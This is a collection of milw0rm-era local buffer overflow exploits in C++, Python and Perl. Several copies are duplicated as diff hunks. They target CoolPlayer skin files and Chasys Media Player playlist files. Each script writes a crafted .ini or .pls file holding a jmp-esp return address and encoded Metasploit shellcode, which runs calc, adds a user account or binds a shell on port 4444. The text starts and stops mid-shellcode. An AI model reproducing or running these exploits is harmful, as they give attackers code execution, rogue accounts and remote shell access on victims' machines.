"\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";
char buffer[1918];
char eip[] = "\x27\x38\x03\x7d"; //jmp esp
cout << "[*] Generating payload\n";
strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");
int i;
for (i=0; i<1534; i++)
buffer[31+i] = 'A';
for (i=0; i<sizeof(eip); i++)
buffer[1565+i] = eip[i];
for (i=0; i<sizeof(scode); i++)
buffer[1569+i] = scode[i];
ofstream outStream;
outStream.open("cp.ini");
outStream << buffer;
outStream.close();
cout << "[+] Skin file created.\n";
return 0;
}
// milw0rm.com [2008-12-21]
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include <iostream>
#include <fstream>
#include <cstdlib> //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";
char buffer[1918];
char eip[] = "\x27\x38\x03\x7d"; //jmp esp
cout << "[*] Generating payload\n";
strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");
int i;
for (i=0; i<1534; i++)
buffer[31+i] = 'A';
for (i=0; i<sizeof(eip); i++)
buffer[1565+i] = eip[i];
for (i=0; i<sizeof(scode); i++)
buffer[1569+i] = scode[i];
ofstream outStream;
outStream.open("cp.ini");
outStream << buffer;
outStream.close();
cout << "[+] Skin file created.\n";
return 0;
}
// milw0rm.com [2008-12-21]


@ -1,64 +1,64 @@
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
"\x41\x54\x46\x34\x46\x34\x42\x50\x5a");
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()
# milw0rm.com [2008-12-22]
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Orginal Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# i've test it on my box(winxp sp3) and didn't work
# so i've re-wrote the exploit and this is workin
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489
Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57"
"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33"
"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46"
"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56"
"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46"
"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47"
"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54"
"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32"
"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36"
"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37"
"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52"
"\x41\x54\x46\x34\x46\x34\x42\x50\x5a");
poc = (header+chars+eip+"\x90"*10+shellcode)
file = open('skin.ini','w+')
file.write(poc)
file.close()
# milw0rm.com [2008-12-22]


@ -1,95 +1,95 @@
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]\nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" .
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" .
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" .
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" .
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" .
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" .
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" .
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" .
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" .
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" .
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" .
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" .
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" .
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" .
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" .
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" .
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" .
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" .
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" .
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" .
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" .
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" .
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" .
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" .
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# milw0rm.com [2009-01-07]
#!/usr/bin/perl
# coolplayer_bof.pl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit
# http://coolplayer.sourceforge.net
#
# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING
#
# C:\Documents and Settings\Administrator> telnet localhost 4444
# .....
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# Some fun, good 'ole win32 smashing.. bada-bing bada-boom!
$header = "[CoolPlayer Skin]\nPlaylistSkin=";
$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP
$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP
# Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444)
$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" .
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" .
"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" .
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" .
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" .
"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" .
"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" .
"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" .
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" .
"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" .
"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" .
"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" .
"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" .
"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" .
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" .
"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" .
"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" .
"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" .
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" .
"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" .
"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" .
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" .
"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" .
"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" .
"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";
$filename = $ARGV[0];
$target = $ARGV[1];
if(!defined($filename) || !defined($target))
{
print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n";
}
if($target == "1") { $retaddr = pack('l', $win2ksp4); }
if($target == "2") { $retaddr = pack('l', $winxpsp3); }
$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508
open(FILE, '>' . $filename);
print FILE $payload;
close(FILE);
exit;
# milw0rm.com [2009-01-07]


@ -1,62 +1,62 @@
#usage: exploit.py
print "**************************************************************************"
print " Chasys Media Player(pls File) Local Stack overflow Exploit\n"
print " Founder: zAx my friend :)"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Good news : The program didn't crash after running the exploit :)"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print "**************************************************************************"
header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A"
header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74"
header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65"
header += "\x31\x3D"
buff1 = "\x41" * 260
eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48"
"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34"
"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38"
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47"
"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59"
